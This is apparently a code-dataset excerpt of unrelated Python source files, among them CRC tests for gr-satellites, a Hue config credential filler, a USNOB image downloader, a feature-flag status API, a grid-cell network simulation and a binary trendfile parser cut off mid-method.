text (string, 6-947k) | repo_name (string, 5-100) | path (string, 4-231) | language (1 class) | license (15 classes) | size (int64, 6-947k) | score (float64, 0-0.34)
---|---|---|---|---|---|---|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2022 Daniel Estevez <daniel@destevez.net>
#
# This file is part of gr-satellites
#
# SPDX-License-Identifier: GPL-3.0-or-later
#
from gnuradio import gr, blocks, gr_unittest
import numpy as np
import pmt
# bootstrap satellites module, even from build dir
try:
import python as satellites
except ImportError:
pass
else:
import sys
sys.modules['satellites'] = satellites
from satellites import crc, crc_append, crc_check
class qa_crc(gr_unittest.TestCase):
def setUp(self):
"""Common part of all CRC tests
Creates a flowgraph, a Message Debug block, and a PDU
containing the numbers 0x00 through 0x0F.
"""
self.tb = gr.top_block()
self.dbg = blocks.message_debug()
self.data = list(range(16))
self.pdu = pmt.cons(pmt.PMT_NIL,
pmt.init_u8vector(len(self.data), self.data))
def run_crc_append(self, crc_params, crc_result):
"""Common part of CRC Append tests
Creates a CRC Append block with the specified crc_params parameters,
connects it to the Message Debug block, sends a test PDU to the
CRC Append block, and checks that the output PDU matches the expected
crc_result.
"""
crc_append_block = crc_append(*crc_params)
self.tb.msg_connect((crc_append_block, 'out'), (self.dbg, 'store'))
crc_append_block.to_basic_block()._post(pmt.intern('in'), self.pdu)
crc_append_block.to_basic_block()._post(
pmt.intern('system'),
pmt.cons(pmt.intern('done'), pmt.from_long(1)))
self.tb.start()
self.tb.wait()
self.assertEqual(self.dbg.num_messages(), 1)
out = pmt.u8vector_elements(pmt.cdr(self.dbg.get_message(0)))
self.assertEqual(out[:len(self.data)], self.data)
self.assertEqual(out[len(self.data):], crc_result)
def common_test_crc_check(self, matching_crc, header_bytes=0):
"""Common part of CRC Check tests
Creates a CRC Append block and a CRC Check block using either the
same CRC or a different one, depending on whether matching_crc
is True or False. Connects CRC Append -> CRC Check -> Message Debug
and sends a PDU through. There are two message debugs to allow
checking whether the PDU ended up in the ok or fail port of the
CRC Check block.
"""
crc_append_block = crc_append(
16, 0x1021, 0x0, 0x0, False, False, False, header_bytes)
x = 0x0 if matching_crc else 0xFFFF
crc_check_block = crc_check(
16, 0x1021, x, x, False, False, False, True, header_bytes)
self.dbg_fail = blocks.message_debug()
self.tb.msg_connect((crc_append_block, 'out'), (crc_check_block, 'in'))
self.tb.msg_connect((crc_check_block, 'ok'), (self.dbg, 'store'))
self.tb.msg_connect((crc_check_block, 'fail'),
(self.dbg_fail, 'store'))
crc_append_block.to_basic_block()._post(pmt.intern('in'), self.pdu)
crc_append_block.to_basic_block()._post(
pmt.intern('system'),
pmt.cons(pmt.intern('done'), pmt.from_long(1)))
self.tb.start()
self.tb.wait()
def test_crc_check(self):
"""Test a successful CRC check
Checks that the PDU ends in the ok port of CRC check
"""
self.common_test_crc_check(matching_crc=True)
self.assertEqual(self.dbg.num_messages(), 1)
out = pmt.u8vector_elements(pmt.cdr(self.dbg.get_message(0)))
self.assertEqual(out, self.data)
self.assertEqual(self.dbg_fail.num_messages(), 0)
def test_crc_check_header_bytes(self):
"""Test a successful CRC check (skipping some header bytes)
Checks that the PDU ends in the ok port of CRC check
"""
self.common_test_crc_check(matching_crc=True, header_bytes=5)
self.assertEqual(self.dbg.num_messages(), 1)
out = pmt.u8vector_elements(pmt.cdr(self.dbg.get_message(0)))
self.assertEqual(out, self.data)
self.assertEqual(self.dbg_fail.num_messages(), 0)
def test_crc_check_wrong_crc(self):
"""Test a failed CRC check
Checks that the PDU ends in the fail port of CRC check
"""
self.common_test_crc_check(matching_crc=False)
self.assertEqual(self.dbg.num_messages(), 0)
self.assertEqual(self.dbg_fail.num_messages(), 1)
out = pmt.u8vector_elements(pmt.cdr(self.dbg_fail.get_message(0)))
self.assertEqual(out, self.data)
def test_crc_append_crc16_ccitt_zero(self):
"""Test CRC-16-CCITT-Zero calculation"""
self.run_crc_append(
(16, 0x1021, 0x0, 0x0,
False, False, False),
[0x51, 0x3D])
def test_crc_append_crc16_ccitt_false(self):
"""Test CRC-16-CCITT-False calculation"""
self.run_crc_append(
(16, 0x1021, 0xFFFF, 0x0,
False, False, False),
[0x3B, 0x37])
def test_crc_append_crc16_ccitt_x25(self):
"""Test CRC-16-CCITT-X.25 calculation"""
self.run_crc_append(
(16, 0x1021, 0xFFFF, 0xFFFF,
True, True, False),
[0x13, 0xE9])
def test_crc_append_crc32(self):
"""Test CRC-32 calculation"""
self.run_crc_append(
(32, 0x4C11DB7, 0xFFFFFFFF, 0xFFFFFFFF,
True, True, False),
[0xCE, 0xCE, 0xE2, 0x88])
def test_crc_append_crc32c(self):
"""Test CRC-32C calculation"""
self.run_crc_append(
(32, 0x1EDC6F41, 0xFFFFFFFF, 0xFFFFFFFF,
True, True, False),
[0xD9, 0xC9, 0x08, 0xEB])
def test_crc_append_crc32c_endianness_swap(self):
"""Test CRC-32C calculation with endianness swapped"""
self.run_crc_append(
(32, 0x1EDC6F41, 0xFFFFFFFF, 0xFFFFFFFF,
True, True, True),
[0xEB, 0x08, 0xC9, 0xD9])
def test_crc_append_crc32c_skip_header_bytes(self):
"""Test CRC-32C calculation skipping some header bytes"""
skip_bytes = 3
self.run_crc_append(
(32, 0x1EDC6F41, 0xFFFFFFFF, 0xFFFFFFFF,
True, True, False, skip_bytes),
[0xE8, 0x62, 0x60, 0x68])
class qa_crc_class(gr_unittest.TestCase):
def test_crc_crc32c(self):
"""Test CRC-32C calculation (using crc class directly)"""
c = crc(32, 0x1EDC6F41, 0xFFFFFFFF, 0xFFFFFFFF, True, True)
out = c.compute(list(range(16)))
self.assertEqual(out, 0xD9C908EB)
if __name__ == '__main__':
gr_unittest.run(qa_crc)
gr_unittest.run(qa_crc_class)
| daniestevez/gr-satellites | python/qa_crc.py | Python | gpl-3.0 | 6,774 | 0 |
## update-hue-ini.py
##
## This script will extract the appropriate IBM Analytics for Apache Hadoop credentials from the VCAP_SERVICES
## environment variable inside a running container. It will add the username and password to the hue.ini file
## so that the hue application has access to a specific instance
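##
## Illustrative (assumed) shape of the VCAP_SERVICES entry this script reads;
## only the keys accessed below are shown, real payloads may contain more fields:
##   {"Analytics for Apache Hadoop": [{"credentials": {
##       "userid": "...", "password": "...", "WebhdfsUrl": "..."}}]}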
import sys
import os
import json
username = None
password = None
webhdfsurl = None
srcfile = sys.argv[1]
destfile = sys.argv[2]
if "VCAP_SERVICES" in os.environ:
vcaps = json.loads(os.environ["VCAP_SERVICES"])
if "Analytics for Apache Hadoop" in vcaps:
username = vcaps["Analytics for Apache Hadoop"][0]["credentials"]["userid"]
password = vcaps["Analytics for Apache Hadoop"][0]["credentials"]["password"]
webhdfsurl = vcaps["Analytics for Apache Hadoop"][0]["credentials"]["WebhdfsUrl"]
else:
if "WEBHDFS_USER" in os.environ:
username=os.environ["WEBHDFS_USER"]
if "WEBHDFS_PASSWORD" in os.environ:
password=os.environ["WEBHDFS_PASSWORD"]
if "WEBHDFS_URL" in os.environ:
webhdfsurl=os.environ["WEBHDFS_URL"]
if (username is not None and password is not None and webhdfsurl is not None):
filedata = None
with open (srcfile,'r') as file:
filedata = file.read()
filedata = filedata.replace('%instance_user%', username)
filedata = filedata.replace('%instance_user_password%', password)
filedata = filedata.replace('%webhdfs_url%', webhdfsurl)
with open (destfile,'w') as file:
file.write(filedata)
sys.exit(0)
else:
sys.stderr.write('Fatal error: cannot find Web HDFS credentials and/or endpoint\n')
if username is None:
sys.stderr.write('username missing\n')
if password is None:
sys.stderr.write('password missing\n')
if webhdfsurl is None:
sys.stderr.write('URL endpoint missing\n')
sys.exit(1)
| vmanoria/bluemix-hue-filebrowser | update-hue-ini.py | Python | gpl-2.0 | 1,829 | 0.02515 |
#! /usr/bin/env python
from urllib2 import urlopen
from urllib import urlencode
from urlparse import urlparse, urljoin
import os.path
from numpy import *
from astrometry.util.file import *
from astrometry.util.usnob_get_image import *
from optparse import OptionParser
if __name__ == '__main__':
parser = OptionParser()
parser.add_option('-r', '--ra-low', '--ra-lo', '--ra-min',
dest='ralo', type=float, help='Minimum RA')
parser.add_option('-R', '--ra-high', '--ra-hi', '--ra-max',
dest='rahi', type=float, help='Maximum RA')
parser.add_option('-d', '--dec-low', '--dec-lo', '--dec-min',
dest='declo', type=float, help='Minimum Dec')
parser.add_option('-D', '--dec-high', '--dec-hi', '--dec-max',
dest='dechi', type=float, help='Maximum Dec')
parser.add_option('-p', '--prefix',
dest='prefix', help='Output file prefix')
parser.add_option('-s', '--survey',
dest='survey', help='Grab only one USNOB survey: poss-i, poss-ii, ... (see http://www.nofs.navy.mil/data/fchpix/cfch.html)')
parser.add_option('-P', '--plate',
dest='plate', help='Grab only one USNOB plate: "se0161", for example')
parser.add_option('-c', '--continue',
dest='cont', action='store_true', help='Continue a previously interrupted transfer')
parser.set_defaults(prefix='usnob', survey=None, plate=None,
ralo=None, rahi=None, declo=None, dechi=None, cont=False)
(opt, args) = parser.parse_args()
if opt.ralo is None or opt.rahi is None or opt.declo is None or opt.dechi is None:
parser.print_help()
parser.error('RA,Dec lo,hi are required.')
radecs = []
decstep = 14./60.
Dec = arange(opt.declo, opt.dechi+decstep, decstep)
for dec in Dec:
rastep = 14./60./cos(deg2rad(dec))
RA = arange(opt.ralo , opt.rahi +rastep , rastep)
for ra in RA:
radecs.append((ra,dec))
radecs = array(radecs)
# Retrieve them in order of distance from the center of the region...
#dists = [distsq_between_radecs(r,d, (opt.ralo+opt.rahi)/2., (opt.declo+opt.dechi)/2.)
# for (r,d) in radecs]
dists = distsq_between_radecs(radecs[:,0], radecs[:,1],
(opt.ralo+opt.rahi)/2., (opt.declo+opt.dechi)/2.)
order = argsort(dists)
for (ra,dec) in radecs[order]:
(jpeg,fits) = get_usnob_images(ra, dec, fits=True, survey=opt.survey, justurls=True)
print 'got jpeg urls:', jpeg
print 'got fits urls:', fits
if opt.plate is None:
keepjpeg = jpeg
keepfits = fits
else:
keepjpeg = [u for u in jpeg if opt.plate in u]
keepfits = [u for u in fits if opt.plate in u]
print 'keep jpeg urls:', keepjpeg
print 'keep fits urls:', keepfits
base = opt.prefix + '-%.3f-%.3f-' % (ra,dec)
for url in keepjpeg:
# like "fchlwFxSl_so0194.000.jpg"
urlfn = url.split('/')[-1]
urlfn = urlfn.split('_')[-1]
fn = base + urlfn
if opt.cont and os.path.exists(fn):
print 'File', fn, 'exists.'
continue
print 'retrieving', url, 'to', fn
res = urlopen(url)
write_file(res.read(), fn)
for url in keepfits:
urlfn = url.split('/')[-1]
urlfn = urlfn.split('_')[-1]
fn = base + urlfn + '.fits'
if opt.cont and os.path.exists(fn):
print 'File', fn, 'exists.'
continue
print 'retrieving', url, 'to', fn
res = urlopen(url)
write_file(res.read(), fn)
| blackball/an-test6 | util/usnob_get_region.py | Python | gpl-2.0 | 3,265 | 0.033691 |
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from infra_libs.infra_types.infra_types import freeze
from infra_libs.infra_types.infra_types import thaw
from infra_libs.infra_types.infra_types import FrozenDict
| endlessm/chromium-browser | tools/swarming_client/third_party/infra_libs/infra_types/__init__.py | Python | bsd-3-clause | 327 | 0 |
import time
def check_vertical(matrix):
max_product = 0
for row in xrange(0, len(matrix)-3):
for col in xrange(0, len(matrix)):
product = matrix[row][col] * matrix[row+1][col] * matrix[row+2][col] * matrix[row+3][col]
max_product = max(product, max_product)
return max_product
def check_horizontal(matrix):
max_product = 0
for row in xrange(0, len(matrix)):
for col in xrange(0, len(matrix)-3):
product = reduce(lambda x, y: x*y, matrix[row][col:col+4])
max_product = max(product, max_product)
return max_product
def check_left_diagonal(matrix):
max_product = 0
for row in xrange(0, len(matrix)-3):
for col in xrange(0, len(matrix)-3):
product = matrix[row][col] * matrix[row+1][col+1] * matrix[row+2][col+2] * matrix[row+3][col+3]
max_product = max(product, max_product)
return max_product
def check_right_diagonal(matrix):
max_product = 0
for row in xrange(0, len(matrix)-3):
for col in xrange(0, len(matrix)-3):
product = matrix[row+3][col] * matrix[row+2][col+1] * matrix[row+1][col+2] * matrix[row][col+3]
max_product = max(product, max_product)
return max_product
def main():
with open("011.txt", "r") as f:
# Read the matrix from the text file, and store in an integet 2-dimensional array
matrix = []
for line in f.readlines():
matrix.append([int(num) for num in line.split(" ")])
# print matrix
# Check the matrix along the various directions, and find the max product of four adjacent numbers
print("The result is %d." % max(check_vertical(matrix), check_horizontal(matrix), check_left_diagonal(matrix), check_right_diagonal(matrix)))
if __name__ == '__main__':
start = time.time()
main()
done = time.time()
print("The solution took %.4f seconds to compute." % (done - start)) | CianciuStyles/project-euler | 011.py | Python | mit | 1,763 | 0.028361 |
# The MIT License (MIT)
#
# Copyright (c) 2014 Steve Milner
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
Status API for flags.
"""
import json
from werkzeug.wrappers import Request, Response
from werkzeug.routing import Map, Rule
from werkzeug.exceptions import HTTPException, NotFound
from flagon.errors import UnknownFeatureError
class FlagonStatusAPI(object):
"""
Simple Flag status read-only REST api.
"""
_url_map = Map([
Rule('/v0/<flag>', endpoint='flag_status')
])
def __init__(self, backend):
"""
Creates the API object. Requires a pre-configured backend.
"""
self._backend = backend
def wsgi_app(self, environ, start_response):
"""
The WSGI App entry point.
"""
request = Request(environ)
response = self.dispatch_request(request)
return response(environ, start_response)
def dispatch_request(self, request):
"""
Dispatcher for requests. Uses the _url_map to find the
proper view to call.
"""
adapter = self._url_map.bind_to_environ(request.environ)
try:
endpoint, values = adapter.match()
return getattr(self, endpoint)(request, **values)
except HTTPException, e:
return e
def __call__(self, environ, start_response):
"""
Callable interface which forwards to wsgi_app.
"""
return self.wsgi_app(environ, start_response)
# VIEWS
def flag_status(self, request, flag):
response = Response(content_type='application/json')
response.headers.add_header(
'Cache-Control', 'no-cache, no-store, must-revalidate')
try:
active = self._backend.is_active(flag)
response.data = json.dumps({
'active': bool(active), 'known': True})
response.status_code = 200
return response
except UnknownFeatureError:
response.data = json.dumps({
'active': False, 'known': False})
response.status_code = 404
return response
def run_local_test_server(backend):
"""
Runs a local test server using the given backend.
"""
from werkzeug.serving import run_simple
run_simple('127.0.0.1', 5000, FlagonStatusAPI(backend))
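# Example interaction with the local test server (a sketch; the flag name
# "my_feature" and the backend contents are assumptions, not part of this module):
#   $ curl http://127.0.0.1:5000/v0/my_feature
#   {"active": true, "known": true}    -> known flag, HTTP 200
#   an unknown flag instead returns {"active": false, "known": false} with HTTP 404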
| pombredanne/flagon | src/flagon/status_api/__init__.py | Python | mit | 3,360 | 0 |
'''Main simulation run: Simulation of a stationary bump.'''
from __future__ import absolute_import, print_function, division
from numpy.random import choice
from nest.hl_api import NESTError
from grid_cell_model.models.parameters import getOptParser
from grid_cell_model.models.gc_net_nest import BasicGridCellNetwork
from grid_cell_model.models.seeds import TrialSeedGenerator
from grid_cell_model.parameters.data_sets import DictDataSet
from grid_cell_model.visitors.spikes import SpikeStatsVisitor
from grid_cell_model.visitors.signals import AutoCorrelationVisitor
from simtools.storage import DataStorage
def signal_analysis(data):
'''Run the signal analysis visitors on a single data trial.
Parameters
----------
data : dict
A dictionary containing data of one trial.
Returns
-------
data : dict
Input data modified in-situ.
'''
monName = 'stateMonF_e'
stateList = ['I_clamp_GABA_A']
dummy_data_set = DictDataSet(data)
stats_visitor_e = SpikeStatsVisitor("spikeMon_e", forceUpdate=False)
ac_visitor = AutoCorrelationVisitor(monName, stateList, forceUpdate=False)
stats_visitor_e.visitDictDataSet(dummy_data_set)
ac_visitor.visitDictDataSet(dummy_data_set)
# Clean the state monitor
data['stateMonF_e'] = [data['stateMonF_e'][0]]
return data
parser = getOptParser()
(options, args) = parser.parse_args()
output_fname = "{0}/{1}job{2:05}_output.h5".format(options.output_dir,
options.fileNamePrefix,
options.job_num)
d = DataStorage.open(output_fname, 'a')
if "trials" not in d.keys():
d['trials'] = []
seed_gen = TrialSeedGenerator(int(options.master_seed))
overalT = 0.
###############################################################################
for trial_idx in range(len(d['trials']), options.ntrials):
print("\n\t\tStarting trial no. {0}\n".format(trial_idx))
seed_gen.set_generators(trial_idx)
d['master_seed'] = int(options.master_seed)
d['invalidated'] = 1
try:
ei_net = BasicGridCellNetwork(options, simulationOpts=None)
const_v = [0.0, 0.0]
ei_net.setConstantVelocityCurrent_e(const_v)
stateRecF_e = choice(ei_net.E_pop, options.gammaNSample, replace=False)
stateRecF_i = choice(ei_net.I_pop, options.gammaNSample, replace=False)
stateMonF_e_params = {
'withtime': False,
'interval': options.sim_dt * 10,
'record_from': ['I_clamp_GABA_A']
}
stateMonF_e = ei_net.getGenericStateMonitor(stateRecF_e,
stateMonF_e_params,
'stateMonF_e')
d['net_params'] = ei_net.getNetParams() # Common settings will stay
d.flush()
ei_net.simulate(options.time, printTime=options.printTime)
ei_net.endSimulation()
d['trials'].append(signal_analysis(ei_net.getAllData()))
d.flush()
constrT, simT, totalT = ei_net.printTimes()
overalT += totalT
except NESTError as e:
print("Simulation interrupted. Message: {0}".format(str(e)))
print("Trying to save the simulated data if possible...")
break
d.close()
print("Script total run time: {0} s".format(overalT))
###############################################################################
| MattNolanLab/ei-attractor | grid_cell_model/simulations/common/simulation_stationary.py | Python | gpl-3.0 | 3,476 | 0.000575 |
import pytest
import os
import shutil
import core
virtuallinks = core.import_package('virtuallinks')
def setup_function(function):
shutil.rmtree('temporary', ignore_errors=True)
os.mkdir('temporary')
os.chdir('temporary')
def teardown_function(function):
os.chdir('..')
shutil.rmtree('temporary', ignore_errors=True)
def test_unmonitor_fail():
with pytest.raises(KeyError):
virtuallinks.unmonitor('open')
def test_monitor_double_unmonitor():
assert virtuallinks.nregistered() == 0
virtuallinks.monitor('open')
virtuallinks.monitor('open')
virtuallinks.unmonitor('open')
assert virtuallinks.nregistered() == 0
def test_monitor_unmonitor_double():
assert virtuallinks.nregistered() == 0
virtuallinks.monitor('open')
assert virtuallinks.nregistered() == 1
virtuallinks.unmonitor('open')
assert virtuallinks.nregistered() == 0
virtuallinks.monitor('open')
assert virtuallinks.nregistered() == 1
virtuallinks.unmonitor('open')
assert virtuallinks.nregistered() == 0
def test_monitor_after_inspector(capsys):
virtuallinks.enable_inspector()
virtuallinks.monitor('open')
out, err = capsys.readouterr()
assert out == ''
assert err == ''
virtuallinks.unmonitor('open')
virtuallinks.disable_inspector()
def _test_monitor_inspector_interleaved_0(capsys):
virtuallinks.monitor('open')
virtuallinks.enable_inspector()
virtuallinks.unmonitor('open')
virtuallinks.disable_inspector()
with open('file.txt', 'w') as f:
f.write('')
assert os.path.exists('file.txt')
assert os.path.isfile('file.txt')
def test_monitor_inspector_interleaved_1(capsys):
virtuallinks.monitor('open')
virtuallinks.enable_inspector()
virtuallinks.unmonitor('open')
with open('file.txt', 'w') as f:
f.write('')
virtuallinks.disable_inspector()
assert os.path.exists('file.txt')
assert os.path.isfile('file.txt')
def test_monitor_inspector_interleaved_2(capsys):
virtuallinks.monitor('open')
virtuallinks.enable_inspector()
with open('file.txt', 'w') as f:
f.write('')
virtuallinks.unmonitor('open')
virtuallinks.disable_inspector()
assert os.path.exists('file.txt')
assert os.path.isfile('file.txt')
def test_monitor_inspector_interleaved_3(capsys):
virtuallinks.monitor('open')
with open('file.txt', 'w') as f:
f.write('')
virtuallinks.enable_inspector()
virtuallinks.unmonitor('open')
virtuallinks.disable_inspector()
assert os.path.exists('file.txt')
assert os.path.isfile('file.txt')
virtuallinks.unmonitor_all()
virtuallinks.unlink_all()
| ffunenga/virtuallinks | tests/core/test_installing.py | Python | mit | 2,693 | 0 |
#!/usr/bin/env python
# encoding: utf-8
"""
trend.datasource.trendfile.py
Handling and parsing of trendfiles (*.hdb)
Copyright (C) 2016/2017 Stefan Braun
This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 2 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import ctypes
import os
import datetime
import calendar
from trend.datasource.dbdata import HighLevelDBData as DBData
from trend.datasource.dbdata import HighLevelDBData2 as DBData2
import configparser
import string
import re
import collections
import misc.timezone as timezone
import itertools
from operator import itemgetter
DEBUGGING = True
class DBData_Timestamp_Search_Result(object):
"""
contains lists of DBData elements after a search for a specific point in time:
-exact: elements with equal timestamps
if "exact"-list is empty, then these lists help to calculate values in between:
-before: elements with same timestamps before point of time
-after: elements with same timestamps after point of time
"""
def __init__(self):
self.before_list = []
self.exact_list = []
self.after_list = []
def set_before(self, before_list):
self.before_list = before_list
def set_exact(self, exact_list):
self.exact_list = exact_list
def set_after(self, after_list):
self.after_list = after_list
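# Note (a sketch, not part of the original API): when exact_list is empty, a value
# at the requested time t can be estimated from the neighbouring samples, e.g. by
# linear interpolation between an element of before_list and one of after_list:
#   v(t) ~ v_before + (v_after - v_before) * (t - t_before) / (t_after - t_before)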
def get_trendfile_structure_obj(file_fullpath):
"""
returns appropriate structure for accessing all DBData elements
(ctypes.Structure doesn't allow unknown amounts of elements)
"""
DMSDP_NOF_BYTES = 83 # based on observations made in class "PDBSData" (pdbsdata.py)
TRENDDATA_OFFSET = 1024 # based ob reverse engineering *.hdb file format
filesize = os.path.getsize(file_fullpath)
# DBData could be ProMoS NT(c) version 1.x or version 2 =>choosing right version
# trendfiles v1.x ends with ".hdb" , v2.x ends with ".hdbx"
file_ext = file_fullpath.split('.')[-1]
if file_ext.upper() == u'HDB':
# using ProMoS NT(c) version 1.x
curr_DBData_class = DBData
else:
# using ProMoS NT(c) version 2.x
curr_DBData_class = DBData2
nof_dbdata_elems = (filesize - TRENDDATA_OFFSET) / ctypes.sizeof(curr_DBData_class)
class Trendfile_structure(ctypes.LittleEndianStructure):
"""
Header contains DMS datapoint name,
data section contains all DBData elements, amount depends on filesize...
"""
# contains some hints from http://stackoverflow.com/questions/18536182/parsing-binary-data-into-ctypes-structure-object-via-readinto
_fields_ = [
("dmsDatapoint", ctypes.c_char * DMSDP_NOF_BYTES), # DMS datapoint name
("UNKNOWN_BYTES", ctypes.c_char * (TRENDDATA_OFFSET - DMSDP_NOF_BYTES)), # perhaps unused
("dbdata", curr_DBData_class * nof_dbdata_elems) # array of DBData elements
]
# return an instance to caller
return Trendfile_structure()
class RawTrendfile(object):
def __init__(self, fileFullpath):
self._fileFullpath = fileFullpath
self._trendstruct = get_trendfile_structure_obj(self._fileFullpath)
self._parseFile_()
def _parseFile_(self):
# reading binary trendfile into ctypes structure
# contains hints from http://stackoverflow.com/questions/18536182/parsing-binary-data-into-ctypes-structure-object-via-readinto
with open(self._fileFullpath, "rb") as f:
f.readinto(self._trendstruct)
def get_dms_Datapoint(self):
return self._trendstruct.dmsDatapoint
def get_nof_dbdata_elements(self):
return len(self._trendstruct.dbdata)
def get_first_timestamp(self):
return self._trendstruct.dbdata[0].get_datetime()
def get_last_timestamp(self):
return self._trendstruct.dbdata[-1].get_datetime()
def get_dbdata_elements_generator(self, start_datetime=None, end_datetime=None):
"""
a generator for memory efficient retrieving DBData elements
(caller can only loop once through generator,
read here: http://stackoverflow.com/questions/231767/what-does-the-yield-keyword-do-in-python )
=>optional arguments allows filtering of DBData elements
"""
# FIXME: implement some filtering (same as in "trendfile.py.old"?) Or is further filtering done in HighLevelTrendfile?
for elem in self._trendstruct.dbdata:
ignore = False
if start_datetime:
if elem.get_datetime() < start_datetime:
ignore = True
if end_datetime:
if elem.get_datetime() > end_datetime:
ignore = True
if not ignore:
yield elem
def get_dbdata_elements_as_set(self):
"""
returns DBData elements in a set()
"""
# FIXME: should we improve this code? How can we get good performance in Megabytes of trenddata?
# FIXME: Should we save the set() for next function execution, or does we allow altering of trenddata in-memory?
return set(self._trendstruct.dbdata)
def get_DBData_Timestamp_Search_Result(self, timestamp_datetime):
"""
returns an instance of DBData_Timestamp_Search_Result according to given timestamp
"""
# FIXME: method works as expected, but we should find a cleaner solution...
search_result = DBData_Timestamp_Search_Result()
# begin and end indeces of three lists don't overlap: [before_begin, ..., before_end] [exact_begin, ..., exact_end] [after_begin, ..., after_end]
# based on examples from https://docs.python.org/2/library/bisect.html
idx_bisect_left = self._get_bisect_left(timestamp_datetime)
# based on example: "Locate the leftmost value exactly equal to x"
# =>collecting all DBData elements with given timestamp
if idx_bisect_left == len(self._trendstruct.dbdata):
# special case: timestamp is higher than highest DBData-timestamp
# =>do workaround: taking last element and continue processing...
curr_elem = self._trendstruct.dbdata[-1]
else:
curr_elem = self._trendstruct.dbdata[idx_bisect_left]
if idx_bisect_left != len(self._trendstruct.dbdata) and curr_elem.get_datetime() == timestamp_datetime:
# we found "exact_begin"
# appending all elements with same timestamp
idx = idx_bisect_left
exact_timestamp = curr_elem.get_datetime()
while idx < len(self._trendstruct.dbdata):
curr_elem = self._trendstruct.dbdata[idx]
if curr_elem.get_datetime() == exact_timestamp:
search_result.exact_list.append(self._trendstruct.dbdata[idx])
idx = idx + 1
else:
break
else:
# no exact search hits found... =>populating list "before"
if idx_bisect_left > 0:
idx = idx_bisect_left - 1
before_timestamp = self._trendstruct.dbdata[idx].get_datetime()
while idx >= 0:
# collecting DBData elements with equal timestamps
curr_elem = self._trendstruct.dbdata[idx]
if curr_elem.get_datetime() == before_timestamp:
search_result.before_list.append(self._trendstruct.dbdata[idx])
idx = idx - 1
else:
break
# ... and populating list "after"
# based on example "Find leftmost value greater than x"
idx_bisect_right = self._get_bisect_right(timestamp_datetime)
if idx_bisect_right != len(self._trendstruct.dbdata):
idx = idx_bisect_right
after_timestamp = self._trendstruct.dbdata[idx].get_datetime()
while idx < len(self._trendstruct.dbdata):
# collecting DBData elements with equal timestamps
curr_elem = self._trendstruct.dbdata[idx]
if curr_elem.get_datetime() == after_timestamp:
search_result.after_list.append(self._trendstruct.dbdata[idx])
idx = idx + 1
else:
break
return search_result
def _get_bisect_left(self, timestamp_datetime):
"""
returns index of DBData element with exact timestamp or later
"""
# our DBData elements are sorted by timestamp
# =>we can use binary searching! There's already class "bisect" for this.
# =>problem: using "bisect" is impossible, it can't handle DBData directly...: https://docs.python.org/2/library/bisect.html
# =>now we adapt algorithm from it's source: https://hg.python.org/cpython/file/2.7/Lib/bisect.py
# Find DBData ("bisect.bisect_left()")
low = 0
high = len(self._trendstruct.dbdata)
while low < high:
mid = (low + high) // 2
if self._trendstruct.dbdata[mid].get_datetime() < timestamp_datetime:
low = mid + 1
else:
high = mid
return low
def _get_bisect_right(self, timestamp_datetime):
"""
returns index of the first DBData element with a timestamp strictly later than the given timestamp
"""
# our DBData elements are sorted by timestamp
# =>we can use binary searching! There's already class "bisect" for this.
# =>problem: using "bisect" is impossible, it can't handle DBData directly...: https://docs.python.org/2/library/bisect.html
# =>now we adapt algorithm from it's source: https://hg.python.org/cpython/file/2.7/Lib/bisect.py
# Find DBData ("bisect.bisect_right()")
low = 0
high = len(self._trendstruct.dbdata)
while low < high:
mid = (low + high) // 2
if timestamp_datetime < self._trendstruct.dbdata[mid].get_datetime():
high = mid
else:
low = mid + 1
return low
class IndexedTrendfile(RawTrendfile):
"""
enhances a trendfile with OrderedDict as index:
key: timestamp
value: list of DBData elements with same timestamp
a second, list-based index allows retrieving DBData-lists by their position
==>both indexes MUST have same size!!!
"""
def __init__(self, fileFullpath):
RawTrendfile.__init__(self, fileFullpath)
self._indexed_by_timestamp = collections.OrderedDict()
self._indexed_by_index = []
# some statistics over DBData items
# with help from http://stackoverflow.com/questions/10576548/python-usable-max-and-min-values
# start min at +inf and max at -inf so the first processed value updates both
self.minValue = float("inf")
self.maxValue = -float("inf")
self._create_index()
if DEBUGGING:
print('constructor of IndexedTrendfile(): file "' + fileFullpath + '" is ready.')
def _create_index(self):
curr_list = []
curr_timestamp = self.get_first_timestamp()
for item in self._trendstruct.dbdata:
# do some statistics, it's not much effort since we already process every item
curr_val = item.get_value_as_float()
if curr_val < self.minValue:
self.minValue = curr_val
if curr_val > self.maxValue:
self.maxValue = curr_val
# append item to current list,
# when there's a new timestamp build a new list
if item.get_datetime() == curr_timestamp:
curr_list.append(item)
else:
# indexing old DBData elements
self._indexed_by_timestamp[curr_timestamp] = curr_list
self._indexed_by_index.append(curr_list)
# preparing new list
curr_list = [item]
curr_timestamp = item.get_datetime()
# indexing last element
if curr_timestamp not in self._indexed_by_timestamp:
self._indexed_by_timestamp[curr_timestamp] = curr_list
self._indexed_by_index.append(curr_list)
assert len(self._indexed_by_timestamp) == len(self._indexed_by_index), 'both indexes MUST have same size!'
def get_DBData_Timestamp_Search_Result(self, timestamp_datetime):
"""
returns an instance of DBData_Timestamp_Search_Result according to given timestamp
=>first we try to get it directly from dictionary,
alternative is binary searching.
"""
